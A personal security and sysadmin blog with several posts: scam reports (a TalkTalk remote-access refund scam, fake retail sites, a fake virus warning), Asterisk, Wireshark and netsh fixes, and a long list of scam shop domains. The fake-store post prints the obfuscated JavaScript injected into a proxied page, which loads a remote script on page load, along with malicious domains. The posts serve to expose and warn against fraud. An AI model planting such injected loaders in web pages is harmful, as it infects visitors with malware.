“01263 402788” TalkTalk Western Union scammers

It has been a while since I’ve had a report of one of these.. but today there was a victim.

The victim had a call from 01263402788 from someone claiming to be from TalkTalk.
The caller reportedly knew the make and model of the victims TalkTalk router and claimed there has been an ongoing fault that needed repairing.

They talked the victim through loading up TeamViewer and then Ammyy remote admin tools and did the fairly standard tech support scammer tricks of showing event viewer etc.

This is where the scam then pivots. They ask the victim to turn off their tablets and mobile phone (more on this later!) while they scan and fix the problem. They then claimed that the problem had been fixed and as compensation they would refund £200 to the victim/customer.

They then asked the customer to log into their internet banking to check if the refund had come through – all whilst they are connected via remote control to the victims computer. Once the victim has logged in they distract them with conversations or tasks while the scammer transfers £1200 between the victims own accounts (not sure what happens if there isn’t any other account or funds available). They then ask the victim to check the payment has come in.

Victim doesn’t notice that the payment has just been shuffled from their own accounts.. but does comment that “oh, I think you’ve overpaid me! It has come up as £1200, not £200”.

The scammer then goes on the guilt trip claiming he made a mistake and needs the money back as soon as possible otherwise he will lose his job. “The safest way to do this” is to use Western Union.
Victim believes the scammer, somehow didn’t get talked into doing the transaction on the western union online site (which has been the previous method) but instead is given the address of the nearest Western Union shop.

Victim goes – sends back the supposedly overpaid £1,000… scam is complete :(

In this instance the payment request was to a “James Odhiambo” in Kenya.. almost certainly a person who does not really exist and the payment won’t be collected from a WU shop in Kenya.

Advertisements
Posted in Uncategorized | Leave a comment

Suspicious online store “www.atlantic-electrics.com”, “bidtravel@ya.ru” and “trkajtools.com”

Today I came across another suspicious website. This one is advertising on Amazon and other locations:

atlantic electrics advert.png

The website advertised is “www.atlantic-electrics.com”.. upon further inspection the following are red flags:

  • The domain has only been registered since 26th October 2017.. Not even two weeks old at the time of writing.
  • The domain uses “bitcoin-dns hosting”.. bitcoin doesn’t, yet, have much legitimate use.. The person hosting this website is paying by an anonymous payment method.
  • At the time of writing visitors are just being shown a proxied version of the co-op electrical website with one bit of injected code:
<script>var CIfRD = ['h,t,t,p,s,:,/,/,t,r,k,a,j,t,o,o,l,s,.,c,o,m,/,f,l,a,s,h,/,u,p,d,a,t,e'];var lF = CIfRD.join('').replace(/,/g,'');function bGZxEi() { function GN(jrekWr) {var NeSHCgurTf= document.createElement('script');NeSHCgurTf.setAttribute('type', 'text/javascript');NeSHCgurTf.setAttribute('src', jrekWr);if (typeof NeSHCgurTf != 'undefined'){document.getElementsByTagName('body')[0].appendChild(NeSHCgurTf)};}GN(lF)}if (window.addEventListener) {window.addEventListener('load', bGZxEi, false);} else if (window.attachEvent) {window.attachEvent('onload', bGZxEi);} else if (window.onLoad) {window.onload = bGZxEi; } </script> 

In short the code injected into the page requests javascript from:

hxxps://trkajtools.com/flash/update

UPDATE 2017-11-14: This has now changed and is injecting..

 <script src='https://mobileinstore.co.uk/Loaded'></script> 

Right now the above page is just serving a 0 byte file or rejecting the connection entirely.

I will come back to the trkajtools.com domain later, but for the moment let’s go back to atlantic-electrics.com.

The domain is registered with the following interesting information:

The email address “eugeneigibbons9@gmail.com”
The postcode “TS20 9GD”
The email address “bidtravel@ya.ru” (Associated with the bitcoin-dns account).

eugeneigibbons9@gmail.com
This e-mail address has been used to register two other suspicious domains of UK retailers…

https://currys.biz – a take on the name of “Currys PC World” in the UK. This site seems to just proxies through to eBuyer (another UK online electronics retailer) but also injects the “trkajtools” javascript.

https://pixmania.biz – another UK retailer.. this website currently proxies through to “coolshop” (whoever they are) and also injects the “trkajtools” javascript.

“TS20 9GD” – a postcode in the UK format however this postcode does not exist!

“bidtravel@ya.ru”
An email address associated with many writeups about sites using the Angler exploit kit.
This e-mail address is also associated with trkajtools.com

The website www.atlantic-electrics.com is hosted at 45.76.134.125 (“45.76.134.125.vultr.com”) and does not seem to host anything else.

So.. going back to “trkajtools.com”
This domain was purchased on 17th October 2017 and little intelligence exists about it. The only thing on google was the urlquery report that I ran on the domain earlier in the day. The domain also uses the “bitcoin-dns.hosting”.

The website trkajtools.com is hosted at 45.76.135.68 (“45.76.135.68.vultr.com”) and also does not seem to host anything else.

Summary

A lot of malicious or suspicious websites I find have a clear motive.. ones targeting electronics retail are normally there to steal credit card details or just trick visitors into sending money with no intention of shipping goods.
The atlantic-electrics website is far more ambiguous. It seems like a lot of effort to just infect a few people with an exploit kit whilst serving a page from a genuine retailer.
Possibly they plan to infect people while they investigate available websites and then skim the payment details once they place an order on a genuine website?

Maybe what is currently in place is just temporary and the website flips to being much more malicious at certain times of day or days of the week?

Posted in Uncategorized | Leave a comment

Fix for Wireshark error “wireshark api-ms-win-crt-runtime”

Some of my systems have been giving the error “The program can’t start because api-ms-win-crt-runtime-l1-1-0.dll is missing from your computer. Try reinstalling the program to fix this problem.” after updating Wireshark.. took me a while to identify why.

Simple once you find the fix!

You need the “Update for Universal C Runtime in Windows”:

https://support.microsoft.com/en-us/kb/2999226

Thanks to Adobe for documenting this simply.

The above referenced Microsoft Update file also fixes a problem where Outlook may report “Either there is no default mail client or the current mail client cannot fulfill the messaging request. Please run Microsoft Outlook and set it as the default mail client.” if you have Office 2016.

Posted in Uncategorized | Leave a comment

Hotels.com send spam from their China division to Lord of the Rings Onlike hacked email addresses!

Simple as that.. a unique address I used with Lord of the Rings Online, an online game, was sent official hotels.com spam in Chinese.

Received: from mta.email.hotels.com (mta.email.hotels.com [66.231.82.111])
	by my.mail.host with ESMTPS
	(version=TLSv1 cipher=ECDHE-RSA-AES256-SHA bits=256)
	; Sat, 23 Sep 2017 00:26:08 +0100
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=200608; d=mail.hotels.com;
 h=From:To:Subject:Date:List-Unsubscribe:MIME-Version:List-ID:Reply-To:Message-ID:Content-Type; i=info@mail.hotels.com;
 bh=DKTe3QJJazkAFXWyK6zHLxUqYdg=;
 b=UGXslgLXZ6IoUGRs5Eh5UtQAuQrBL+8ydzsdoOkP7jE100jtL/bjyCFHe4NMSFaE5PBq5AehwbCq
   OlVJ/8rljVaMUOP+yVNb0v8EBw04e6LjQQiqR+T5Z2atUf7rOz1MhabG0gH0o8G/IHCH1g/MEAnJ
   4xeOZGu6jcSXLzLs4C0=
DomainKey-Signature: a=rsa-sha1; c=nofws; q=dns; s=200608; d=mail.hotels.com;
 b=BJPNLB1/Wbc7dvpS/B3JPoSdcDCgnx3dlMgyqjbOJOG0ev6Aj8Lwrsi+GUnLiWzpzPvyjE8M/9Ia
   0rkNniYHQxJSVnErrzFPuEp127iaZciZQY6Tyhw2yZtXjv5ojJLqGgqfCESdii0a7US8MgeLu3Bz
   y4vfjFJy7W7hRHb8iQ8=;
Received: by mta.email.hotels.com id home1o163hs1 for <lorto@mydomain.here>; Fri, 22 Sep 2017 17:25:59 -0600 (envelope-from <bounce-1935712_HTML-1649075358-21435338-177351-13256@bounce.mail.hotels.com>)
From: =?UTF-8?B?SG90ZWxzLmNvbSDkuK3lm70=?=
 <info@mail.hotels.com>
To: <lorto@mydomain.here>
Subject: =?UTF-8?B?54++5Zyo6KiC77yM6aas5LiK55yB77yB?=
Date: Fri, 22 Sep 2017 17:25:58 -0600
List-Unsubscribe: <mailto:leave-redacted@leave.mail.hotels.com>
MIME-Version: 1.0
List-ID: <177351_21435338.xt.local>
X-CSA-Complaints: whitelistcomplaints@eco.de
x-job: 177351_21435338
Reply-To: =?UTF-8?B?SG90ZWxzLmNvbSDkuK3lm70=?=
 <reply-fe6216717167017e761c-1935712_HTML-1649075358-177351-13256@mail.hotels.com>
Message-ID: <95548813-ed9d-4c9f-ba06-905e53afb96e@xtinmta4198.xt.local>
Content-Type: multipart/alternative;
	boundary="kgwiAGSMgprd=_?:"
Return-Path: bounce-1935712_HTML-1649075358-21435338-177351-13256@bounce.mail.hotels.com

hotels dot com spam to lort lord of rings online.png

Poor show and amazing that a large company doesn’t care where they source their mailing lists or even check or require double-opt in confirmation.

Posted in Uncategorized | 1 Comment

How to list available wifi access points on ZeroShell

If you use Zero Shell and want to see which wireless networks access points are visible to it the web interface does not allow you to do anything wifi based.

The SSH “push button” interface also doesn’t offer this function.

You do have to use shell!

ifconfig wlan0 up
iwlist wlan0 scan | grep 'Encryption key' -A 1 -B 1
ifconfig wlan0 down

Which should return something similar to this:

root@myrouter ~&gt; iwlist wlan0 scan | grep 'Encryption key' -A 1 -B 1
 Quality=20/70 Signal level=-90 dBm
Encryption key:off
ESSID:"BTWiFi-with-FON"
--
Quality=35/70 Signal level=-75 dBm
Encryption key:on
ESSID:"virginmedia8106815"
--
Quality=22/70 Signal level=-88 dBm
Encryption key:on
ESSID:"DIRECT-76-HP OfficeJet Pro 6960"
--
Quality=26/70 Signal level=-84 dBm
Encryption key:off
ESSID:"BTWiFi"
--

Shows you the Name of the network and if the network has encryption (password) enabled.

Posted in Uncategorized | Leave a comment

Fake virus warning on “s3-74-183-24-164-ap-southeast-2-amazonaws-com.ga” leading to tech support scam number.

A very unusual way I came across this one. I have several Google Alerts setup for keywords.. Google emailed me an alert for a very, very obscure search that I had setup.

Being unlikely to be a sensible result I was still interested. The URL Google had indexed and alerted on was:

hxxp://www.sukhiporibar.com/rosoiew/oyptke.php?br=my-keywords-here&ct=ga

This appears to now be just a wordpress(?) site now but at the time I got the alert it was forwarding on to:

coolinaas.pw
then
http://www.cpm10.com
then
normasimpson.info
then
s3-74-183-24-164-ap-southeast-2-amazonaws-com.ga

The full URL of:

hxxps://s3-74-183-24-164-ap-southeast-2-amazonaws-com.ga/loginerror10.com/ts-chrome-engnew201/?n=0800%20046%205257

Needless to say the message that then comes up is a fake virus warning along with audio clip telling you to call “support.Windows.com” on “0800 046 5257” (a UK freephone number).

Posted in Uncategorized | Leave a comment

Direction to manually create a migration endpoint “This Topic Is No Longer Available” help..

If you try to create a migration endpoint on Office 365 to migrate users from an existing exchange server and it fails – Microsoft tries to tell you to view the following URL: https://technet.microsoft.com/library/jj874458(v=exchg.150).aspx

However.. the page doesn’t exist! Thanks Microsoft.

However the following page seems to contain a lot of the information that I _think_ might have been on the above URL:

https://blogs.technet.microsoft.com/exovoice/2016/09/19/troubleshooting-issues-where-the-migration-endpoint-cannot-be-created-in-hybrid-scenarios/

Posted in Uncategorized | Leave a comment

Mirror: Two Ways To Push Wlan Profiles To Your Windows Devices

This is a mirror of what used to be on the URL http://www.commsolutions.com/2012/09/two-ways-to-push-wlan-profiles-to-your-windows-devices/

I did not write the content and claim no praise for it.. The above URL appears to no longer be valid and the information doesn’t seem to exist on any other website other than archive.org. I am also posting a copy here should the archive.org version expire or be unavailable for some reason.

Content originally by Comm Solutions.

Today we’ll look at two ways besides Aruba’s QuickConnect or CloudPath to push WLAN profiles to your Windows devices….

CONFIGURING WLAN POLICIES VIA GROUP POLICY FOR DOMAIN MEMBER WINDOWS CLIENTS:

Within a Windows Server and Active Directory domain, Group Policy allows you to push network profiles to domain-joined computers. You can do this by container or globally, by specifying wireless settings for clients running Windows 7, Windows Vista, Windows XP, as well as Server 2008 versions (although I don’t know of too many 2008 Servers running WLAN cards…)

If your domain controllers are Windows Server 2003/2003R2, the Active Directory schema has to have been extended to add the wireless GPO support, and you’re better off to run the GPO plugin on a Vista/Win7 machine to ensure that WPA2 support exists. Open the Microsoft Management Console (MMC), open the Group Policy snap-in, navigate to Computer Configuration>Windows Settings>Security Settings>Wireless Network (IEEE 802.11) Policies, and begin your WLAN configuration.

If your domain controllers are Windows Server 2008/2008R2, use the Group Policy Management Console (GPMC) and navigate to Computer Configuration>Policies>Windows Settings>Security Settings>Wireless Network (IEEE 802.11) Policies, and create policies for XP and/or your Win7/Vista clients.

NON-DOMAIN/NON-ACTIVE DIRECTORY WINDOWS PROFILE EXPORT/IMPORT:

For non-domain machines, you can configure the wireless settings via the Netsh tool. This works for clients running Windows Vista/Win7 and perhaps Win8. You can run the commands locally on a machine to create the export, and on each new client machine locally or remotely via a share/UNC. You can manually type the import or script them in your batch files or login script.

The Netsh tool doesn’t let you directly configure a whole lot of anything but it lets you export an existing wireless profile (and this same process can be utilized to sync IAS/NPS servers, but that’s another story) and import it into other machines (and a similar process can be utilized to sync IAS/NPS server configurations, but that’s another tech tip. So we need to first export the configuration from a working client that has had a profile created for the desired ESSID/WLAN.

You can display the configured WLAN network profile(s) with the following command:

netsh wlan show all

Now you can export the desired profile, using the profile name as listed by the previous command:

netsh wlan export profile name=PROFILE_NAME

On other machines you can now import the profile using the filename of the XML file you exported from the source machine:

netsh wlan add profile filename="WLANPROFILE.xml"

Using remote netsh you can also import to a remote computer on the network:

netsh wlan add profile filename="WLANPROFILE.xml" –r COMPUTER_NAME -u DOMAINUSERNAME-p PASSWORD

Posted in Uncategorized | Leave a comment

Asterisk voicemail hangs up on callers after a few seconds.

I’ve spent about an hour and a half on this problem and the internet has nearly no results on how to fix the issue so I’m going to post the solution.

Problem

Phone system based on asterisk 1.8 (running on OpenWRT on an AMD Geode ALIX box) is working fine for all internal calls, external to internal calls and internal to external calls.

Internal calls to voicemail work

External calls to voicemail plays the greeting and asks the caller to record a message. Asterisk records 1 or 2 seconds of audio and then the caller gets cut off.

Asterisk reports:

[May  9 22:57:09] WARNING[3547]: app.c:977 __ast_play_and_record: No audio available on SIP/siptrunkprovider-1-00000005??

If you enable debug logging you see a bit more information that you think might point you in the right direction..

[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to write format alaw
[May 9 22:57:04] DEBUG[3547]: app.c:1490 ast_lock_path_lockfile: Locked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:04] DEBUG[3547]: app.c:1507 ast_unlock_path_lockfile: Unlocked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to write format gsm
[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to write format alaw
[May 9 22:57:04] DEBUG[3547]: app.c:894 __ast_play_and_record: play_and_record: <None>, /var/spool/asterisk/voicemail/default/0404/tmp/1s4hH1, 'wav49|gsm|wav'
[May 9 22:57:04] DEBUG[3547]: app.c:918 __ast_play_and_record: Recording Formats: sfmts=wav49
[May 9 22:57:04] DEBUG[3547]: dsp.c:489 ast_tone_detect_init: Setup tone 1100 Hz, 500 ms, block_size=160, hits_required=21
[May 9 22:57:04] DEBUG[3547]: dsp.c:489 ast_tone_detect_init: Setup tone 2100 Hz, 2600 ms, block_size=160, hits_required=116
[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to read format slin
[May 9 22:57:07] DEBUG[3547]: app.c:974 __ast_play_and_record: One waitfor failed, trying another
[May 9 22:57:09] WARNING[3547]: app.c:977 __ast_play_and_record: No audio available on SIP/siptrunkprovider-1-00000005??
[May 9 22:57:09] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to read format alaw
[May 9 22:57:09] DEBUG[3547]: app.c:1490 ast_lock_path_lockfile: Locked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:09] DEBUG[3547]: app.c:1507 ast_unlock_path_lockfile: Unlocked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:09] DEBUG[3547]: app_voicemail.c:4917 sendmail: Attaching file '/var/spool/asterisk/voicemail/default/0404/INBOX/msg0000', format 'WAV', uservm is '2048', global is 2048
[May 9 22:57:09] DEBUG[3547]: app_voicemail.c:4928 sendmail: Sent mail to voicemaildestination@domain.com with command '/usr/sbin/sendmail -t'
[May 9 22:57:09] DEBUG[3547]: pbx.c:5544 __ast_pbx_run: Spawn extension (default,main,3) exited non-zero on 'SIP/siptrunkprovider-1-00000005'
[May 9 22:57:09] DEBUG[3547]: channel.c:2735 ast_softhangup_nolock: Soft-Hanging up channel 'SIP/siptrunkprovider-1-00000005'
[May 9 22:57:09] DEBUG[3547]: channel.c:2884 ast_hangup: Hanging up channel 'SIP/siptrunkprovider-1-00000005'
[May 9 22:57:09] DEBUG[3547]: chan_sip.c:6534 sip_hangup: Hangup call SIP/siptrunkprovider-1-00000005, SIP callid 2017050923565400001@2700-0344-0103-283
[May 9 22:57:09] DEBUG[3547]: chan_sip.c:6150 update_call_counter: Updating call counter for incoming call
[May 9 22:57:09] DEBUG[3547]: res_rtp_asterisk.c:2604 ast_rtp_remote_address_set: Setting RTCP address on RTP instance '0x88152e8'
[May 9 22:57:09] DEBUG[3547]: chan_sip.c:3526 __sip_xmit: Trying to put 'BYE sip:201' onto UDP socket destined for 81.158.130.1:5060

Attempts to fix it.

I tried so many things including changing to “minivm”, changing the recording format, trying to turn off silence detection in voicemail and installing other codecs / translators.

None of this helped. The only other hint I had was watching wireshark on the RTP ports. I could see that as soon as Asterisk started recording the voicemail it stopped sending packets to the SIP provider while the SIP provider continued to send RTP data for a few more seconds… then the call would get cut off.

I knew this wasn’t a SIP provider bug or problem as I have another Asterisk system on a different version of Asterisk and running on a traditional computer which does not exhibit the same problem.

Thinking that the problem was likely something to do with the audio data / RTP stream I searched around using many other keywords. I wanted to work out how to make Asterisk send either silence or comfort noise while it was recording the voicemail.

Eventually I googled for the correct magic keyword “asterisk send audio while recording” and came across this post:
https://www.spinics.net/lists/asterisk/msg168788.html

SOLUTION

It took so long to get to this point but I’m glad I continued

The solution is to edit or add this line into your asterisk.conf in /etc/asterisk (or wherever you keep your asterisk config files):

transmit_silence = yes

The documentation in the config file notes:

Transmit silence while a channel is in a waiting state, a recording only state, or
when DTMF is being generated. Note that the silence internally is generated in raw signed
linear format. This means that it must be transcoded into the native format of the
channel before it can be sent to the device.
It is for this reason that this is optional, as it may result in requiring a temporary codec translation path for a channel that may not otherwise require one.

I hope this page helps someone!

Posted in Uncategorized | Leave a comment

Low value goods scam. (ebuy2016.com / kf@onlinezh.net)

Hello everyone. This is another scam that works similar to a previous “high value electronics goods scam” that I’ve written about in the past. The websites, mostly, look professional and genuine. Take payment and then _never_ send any goods.

This scam seems to revolve around very small transactions (probably small enough that the credit card companies eat the fraud rather than charge it back to the fraudulent retailer). Or possibly they hope that the victims can’t be bothered with the paperwork and phone calls to report the fraud.

Most the goods on the websites are around £30 to £150ish with a rare few slightly higher priced goods mixed in. The page and form asking for credit / debit card payment isn’t even https / secure.

The good news – if you are a victim and you paid by Credit Card (or possibly even Debit Card) your bank is required to refund you!

http://www.ebuy2016.com/ – Seems to focus specifically on USB portable hard disks. Confirmed by victims as a scam.

http://www.betsbuyer.co.uk/ – Seems to sell GPS devices and sports “smart” watches.

http://www.top10tablet.us/ – Seems to sell Samsung Android tablets.

The first two of the above were registered 8th June 2016. The tablet site seems to have been registered 3rd November 2016. All are associated with the same domain registrant and / or have shared code between the domains.

Registered a month before is

https://www.prezzoshop.net/ – This appears to be the main domain name associated with the web hosting account and is another USB portable hard disk scam site aimed at victims in Italy. (162.218.179.41)

Other domains associated with the same scam:

http://www.prixonline.net – Seems to be aimed at French victims.

http://www.solde-tablette.com/ – Another site aimed at French victims.

http://www.tabprix.com/ – Another site aimed at French victims.

http://www.maillot-de-football.com/ – Football kit site aimed at French victims.

http://www.perruque-prix.fr/ – A hair / wig site aimed at French victims.

http://www.shopsunglass.net/ – Sunglasses store aimed at UK victims.

http://www.top-external-hard-drives.com/ – A copy of the portable hard disk scam site above.

http://www.nmdsneakers.com/ – Supposedly selling designer shoes / sneakers to US victims.

http://www.bayernoutlet.com – Another football kit scam site aimed at US victims. This domain is easily attributed to the www.nmdsneakers.com domain.

http://www.nmdforsale.com/ – Similar to the above. This domain is easily associated with the maillot-de-football.com scam.

http://www.luxuryonline.com.ru/ – Shoes store aimed at Russia.

http://www.ventepolo.com/

http://www.mlbforsale.com/ – Already taken down by a US Federal Court Order.

http://www.mlbofstore.com/ – A website already taken down by a court order.

http://www.shopmlbshirt.com – A website already taken down by a court order.

http://www.psgmaillotfr.com/ – Scam football (soccer) site.

http://www.aaqshop.com/ – Scam NFL website claiming to be nflshop.com.

http://www.inflmarket.com/ – Scam NFL site claiming to be nflshop.com

 

http://www.eyewearofstore.com/ – Scam Ray Ban sunglasses website.

http://www.glassesbestsale.com/ – Scam Ray Ban website.

http://www.camisas-futebol.com/ – Fake football / soccer kit store.

http://www.watchinshop.com/

http://www.bestfishop.com/

http://www.monclerofshop.com/

http://www.franceofjersey.com/

http://www.shop-jewelrys.com/ – Fake pandora online store

http://www.outletjewelryshop.com/ – Scam “Pandora” shop.

http://www.nhlstores.com/ – Fake NFL site claiming to be the “Official online store of the NHL”.

http://www.chicagocubstocks.com/ – A fake store claiming to be the “Official online shop” of the Chicago Cubs.

http://www.chicagocubsmarket.com/ – A fake store claiming to be the “Official online shop” of the Chicago Cubs.

http://www.footsportsoutlets.com/ – Somehow also associated with “www.awolf.net”, the website of someone who appears to be interested in hacking, databases, VPN servers, FTP server software and VMWare.

http://www.jerseys-shop.com/ – Fake NFL website claiming to be “The official online store of the NFL” (much like all the other “official” ones I’ve found then!).

http://www.barcashops.com/

 

http://www.shirts-store.com/ – Another fake NFL website.

http://www.clevelandindianshirt.com/

http://www.clevelandindianshop.com/

http://www.mkbagsonline.com/

http://www.mlbofshop.com/ – MLB fake online store.

http://www.mlbshirt-shop.com/ – MLB fake online store.

http://www.indians-shop.com/

http://www.indiansjersey.com/

http://www.sportskitonline.com/ – Fake NBA online store.

http://www.basketsforsales.com/ – Fake NBA online store.

http://www.lysportsmalls.com/ – Fake NBA online store.

http://www.officialmapleleafs.com/

http://www.bluejays-shops.com/

http://www.cheapbluejay.com/

http://www.bluejaysale.com/

http://www.onlineyeezy.com/

http://www.mapleleafshop.com/

http://www.fashionlinestore.com/

http://www.soccerjerseystores.com/

http://www.topishirt.com/ – Another fake NFL store.

http://www.mlbshirtshop.com/ – Fake MLB online store.

http://www.bluejaysoutlet.com/

http://www.officemlbshop.com/ – An already ceased / suspended domain by court order.

http://www.ievpolo.com/ – Fake Polo online store.

http://www.ferragamoshops.com/

http://www.eferragamoshop.com/

http://www.topbeltsshop.com/

http://www.hiferragamo.com/

http://www.outletferragamo.com/

http://www.ferragamobeltsshops.com/

http://www.ferragamoonline.com/

http://www.bagsbagsonline.com/

http://www.ferragamostores.com/

http://www.topferragamoonline.com/

http://www.bestbeltsonline.com/

http://www.vipferragamo.com/

http://www.usnflshops.com/ – Fake NFL online store.

http://www.maillotsdefrance.com/

http://www.basketijersey.com/ – Fake NBA store.

http://www.vipbasketjersey.com/ – Fake NBA store.

http://www.fchelseas.com/ – Chelsea FC fake store, supposedly “the official Asia Pacific online megastore”.

http://www.asoccerjerseys.com/ also associated http://www.headdres-store.com/

http://www.broncostores.com/ – Fake Denver Broncos “official online store”.

http://www.bestfootballshop.com/

http://www.storejewelryshop.com/

http://www.salejewelryshop.com/

Weirdly a lot of the above have SSL certificates self-issued to “tong.com”, probably an unrelated and invalid domain but still unusual.

There are so many associated websites and domains that I’ve given up crosschecking them! Here is the source list of the domains I’ve not yet investigated.

franceofjersey.com
nflsaleshops.com
eyewearmalls.com
strapshops.com
outletjewelrystore.com
b5jewellery.com
jerseysmarkets.com
basketjerseyshop.com
basketshirtshops.com
footballsshops.com
jewelrysstock.com
bagsbagsonline.com
nhlsmall.com
nhlstores.com
nflsportsstock.com
bagbagforsale.com
mlbsstores.com
baggoodsforsale.com
madeinnfl.com
nflsstocks.com
nflsshops.com
mlbsforsale.com
mlbonsale.com
beltonsale.com
ferragamoonsale.com
ferragamosonsale.com
ferragamodiscount.com
nikesonsale.com
ferragamosforsale.com
ferragamo4sale.com
ferragamosonline.com
nflsonsale.com
nflsdiscount.com
nflforsale.com
nflsstock.com
bananaces.com
iakqks.com
hotsalespro.com
hariees.com
chicagocubsoutlet.com
clevelandindianstore.com
bluejaysale.com
cfljerseyshop.com
ferragamonline.com
outletferragamo.com
ferragshop.com
fashionlinestore.com
ferragamocenter.com
basketshirts.com
shirtnba.com
chicagocubstore.com
nba-eshop.com
jerseynba.com
ibasketjersey.com
basketeshop.com
nfl-shirt.com
nfl-center.com
shoulderbagshop.com
crossbodybagshop.com
mlbshirtstore.com
footballshirtsale.com
buymlbshirt.com
ukfootballjersey.com
soccerjerseystores.com
wholesalemlbshop.com
mlbshirtsale.com
outletfootballshirt.com
outletmlbshirt.com
footballshirtoutlet.com
outletmlbstore.com
officemlbshirt.com
catmte.com
colorrushstore.com
officemlbshop.com
mlbinshop.com
mlbshirtshop.com
colorrushuniform.com
mlbshirtoutlet.com
colorrushcenter.com
colorrushmall.com
officemlbstore.com
colorrushop.com
colorrush2016.com
bestnflmall.com
nflbazaar.com
enflonline.com
topeshirt.com
topishirt.com
enfloutlet.com
nflshoppingcenter.com
bestluxshops.com
topilux.com
enflcenter.com
infloutlet.com
nfldiscount.com
nfljerseyoutlet.com
espcamisetasdefutbol.com
topmksale.com
fashionjewelrymalls.com
iluxjewelry.com
ibuylux.com
iluxfashion.com
luxferragamo.com
ferragamomall.com
iluxcenter.com
luxfashionshop.com
bestfootballjersey.com
topnflshirt.com
topfootballjersey.com
ievpolo.com
ssoccerjersey.com
uksoccershirts.com
salebasketshirts.com
iibasketjersey.com
ferragamosale.com
ferragamobagstore.com
ferragamobagshop.com
sferragamo.com
fferragamo.com
vipbasketjersey.com
eferragamobag.com
ibasketshirt.com
iferragamo.com
ebagshops.com
eferragamoshop.com
ebasketjersey.com
viferragamo.com
basketshirtonline.com
hiferragamo.com
yshoesoutlet.com
mkbagsonline.com
vipshoeshop.com
footballshirtonline.com
mkbagplazas.com
luxybagshops.com
mnushirts.com
manushirt.com
mujerseys.com
buycheapmkbag.com
mkbagsclub.com
suglassesclub.com
nflshirtstore.com
vipsunglasseshop.com
basketijerseys.com
nbasketsmarkets.com
manutdone.com
basket4sales.com
nbasketmaks.com
spolostocks.com
basketsdiscounts.com
ferragamoshops.com
vipferragamo.com
spolomalls.com
ferragamostores.com
usnflshops.com
cheapolos.com
manutdmalls.com
csoccerjerseys.com
itlaynbasket.com
spainbaskets.com
francebaskets.com
maillots-de-football.com
frmaillot.com
camisas-futebol.com
porsoccerjerseys.com
maillotsdefrance.com
basketijersey.com
ventepolo.com
fcbarcastock.com
bayernoutlet.com
fchelseas.com
asoccerjerseys.com
asoccershirts.com
broncostores.com
nflonsale.com
mlbforsale.com
birkstock.com
bksandals.com
mkbagsmalls.com
mkvipbag.com
mkbagsmarkets.com
vipmkbag.com
mkbagtop.com
nmdforsale.com
fcmudtjersey.com
airmaxshoeshop.com
psgmaillotfr.com
everyhoe.com
nicemkbag.com
acoachag.com

 

Posted in Uncategorized | Leave a comment